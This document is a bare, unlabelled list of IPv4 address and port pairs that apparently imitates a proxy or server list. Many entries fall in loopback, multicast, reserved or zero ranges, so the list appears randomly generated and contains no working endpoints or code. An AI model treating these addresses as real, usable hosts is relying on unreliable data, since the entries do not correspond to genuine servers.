184.131.56.196:2052
127.184.38.44:44430
32.84.71.171:29963
200.220.105.203:19715
90.120.71.181:15878
11.254.12.182:9456
211.52.115.224:18810
138.204.35.240:4424
104.48.18.44:1060
95.213.79.150:9292
62.91.22.236:16333
5.233.95.5:29359
185.77.11.33:14777
183.207.189.98:50002
174.55.91.4:4332
76.189.34.76:4039
19.192.126.231:1617
46.211.255.93:52733
211.218.201.153:15545
159.146.130.27:31535
182.24.73.135:46024
125.239.50.232:62034
117.158.139.202:47474
145.106.168.134:53166
79.196.38.8:57098
189.73.237.178:36145
132.96.219.33:58259
155.119.153.140:43820
75.107.133.113:56161
1.243.59.211:12572
90.121.3.188:224
33.201.95.208:27754
183.45.1.25:13249
192.217.137.183:52375
143.85.175.65:17841
241.219.119.9:38154
185.40.35.42:6540
124.253.211.46:57742
181.233.143.152:9912
153.122.45.34:50716
8.255.244.188:33936
208.189.35.192:2074
237.180.253.218:53122
20.135.6.65:43121
37.91.22.227:60465
255.224.222.137:11062
199.57.245.30:30904
170.11.114.16:16552
107.72.197.231:22727
123.138.102.113:7991
181.16.45.159:34197
124.15.0.189:55319
75.126.173.64:40856
23.156.210.184:46488
235.195.106.66:967
57.73.49.111:309
0.214.143.29:4535
187.245.235.11:55723
120.34.66.32:13328
18.202.195.170:47407
0.80.139.135:25682
200.61.2.130:4660
188.191.235.84:55812
153.114.241.10:63274
80.196.171.140:16400
164.74.114.168:8801
107.170.204.81:50435
140.247.190.46:35982
104.66.55.13:10565
102.51.215.239:44326
54.185.159.150:24388
254.37.121.108:8910
100.67.216.110:60110
73.229.70.27:2067
62.82.114.197:2063
27.216.58.167:8874
227.198.45.138:19756
206.37.38.209:5226
154.179.194.106:62538
162.237.78.236:9344
251.115.22.217:31540
194.122.181.28:54718
38.182.174.76:40173
232.55.61.205:24837
119.252.153.175:21501
149.130.97.94:64503
92.191.42.215:15745
206.2.54.55:1184
118.195.118.119:43095
137.29.30.1:55132
120.162.229.253:8863
64.106.125.143:7465
161.164.214.153:58434
17.141.203.248:13016
74.111.141.130:26145
7.245.84.186:13032
207.107.93.200:15986
126.87.55.127:1496
213.214.100.188:39924
178.135.53.102:52851
187.12.252.228:5329
130.76.84.1:12211
106.4.197.226:63315
250.43.185.209:15617
27.20.144.179:27379
68.154.88.100:20026
11.184.152.26:1724
37.49.252.146:52803
18.179.109.249:57561
147.115.41.123:50177
146.248.241.90:44789
90.179.41.221:30327
208.156.12.145:15914
181.151.57.173:40101
106.102.11.15:57445
168.235.210.214:14854
112.80.132.46:2696
150.40.224.145:53802
200.63.45.4:33580
56.134.24.142:53968
50.11.224.105:8741
249.35.156.13:46759
82.190.79.13:32174
31.6.91.57:56601
150.144.79.187:9530
248.22.23.155:30418
191.179.34.2:57268
136.77.150.0:42841
46.192.74.63:56431
11.21.233.201:33760
98.155.177.121:44601
41.183.104.25:48315
239.230.182.63:33944
95.107.179.62:21878
26.187.207.224:42343
150.65.151.208:8847
93.232.237.191:34073
90.248.126.82:19715
160.109.77.118:9054
18.128.123.248:28989
18.6.67.158:63771
217.239.247.19:35525
202.132.96.177:21002
15.215.164.100:19020
42.191.219.238:37348
71.69.163.85:37501
15.4.93.181:62751
102.27.142.164:48149
85.248.225.37:63245
105.88.226.167:39765
166.222.170.6:57464
109.228.254.88:1282
156.240.254.112:52425
145.140.60.103:583
7.176.249.241:62351
212.54.193.40:25862
155.137.83.46:5256
32.180.233.98:56276
119.154.153.157:44181
81.83.175.63:17841
173.217.119.35:329
117.130.63.105:59083
12.113.156.192:44570
182.67.238.106:12362
18.91.208.236:43779
190.225.153.181:27537
134.22.186.193:11379
68.203.193.133:62255
97.154.214.160:51600
205.89.105.42:577
115.223.48.243:19922
59.102.73.2:1972
171.93.253.70:53232
64.245.25.242:31970
70.245.255.84:62719
213.123.198.89:41989
156.239.210.45:52103
38.68.161.238:37704
12.90.239.143:1727
180.235.120.25:3473
28.113.63.67:33730
228.18.226.242:35172
246.233.98.100:20694
97.13.169.210:52482
45.74.109.180:2047
52.208.53.89:54061
252.39.29.37:32655
199.60.116.17:18115
244.138.137.201:56553
8.203.154.75:21301
21.81.97.159:30021
220.253.211.109:37319
91.200.107.118:23008
190.230.58.145:40385
48.140.118.115:3957
221.18.61.223:28719
164.19.222.31:48825
148.195.180.9:8015
98.179.87.193:64141
223.57.176.133:22284
131.96.117.59:3808
157.190.189.136:12778
72.24.6.136:44136
129.142.203.125:12476
1.177.202.244:40183
32.210.208.25:58136
109.60.185.248:49787
81.159.20.146:61075
76.227.5.136:31210
113.138.150.225:32145
46.114.224.197:59956
20.217.131.53:37219
250.6.229.141:40245
64.139.87.221:57868
198.17.92.123:10013
234.205.132.62:6825
247.87.208.220:5208
44.165.104.186:8183
251.236.206.151:27168
231.252.249.179:62219
1.114.150.97:61067
62.148.148.96:45584
169.117.183.169:62012
33.100.139.127:52793
186.206.38.179:58621
9.251.211.245:11177
29.228.24.101:49040
134.194.246.243:53502
233.11.11.185:14620
126.152.1.119:63669
152.128.197.88:57527
45.86.150.191:20782
102.15.238.54:54717
82.145.238.164:30306
58.233.80.249:2644
37.224.66.6:28849
170.113.222.128:7219
221.68.0.165:12881
151.34.100.128:22067
35.179.253.2:693
215.39.241.157:39431
233.15.21.169:9996
233.207.20.224:9812
243.149.8.1:12975
149.40.170.35:42555
149.88.254.64:51603
149.107.23.222:37240
45.203.135.87:46594
132.37.136.205:60008
154.231.198.11:47145
238.249.138.70:48589
47.208.143.184:57882
105.219.128.138:14637
203.16.125.135:20331
11.191.225.91:54264
77.251.219.98:59670
115.158.55.22:30148
8.37.71.111:26026
152.201.216.162:59919
188.223.219.209:11906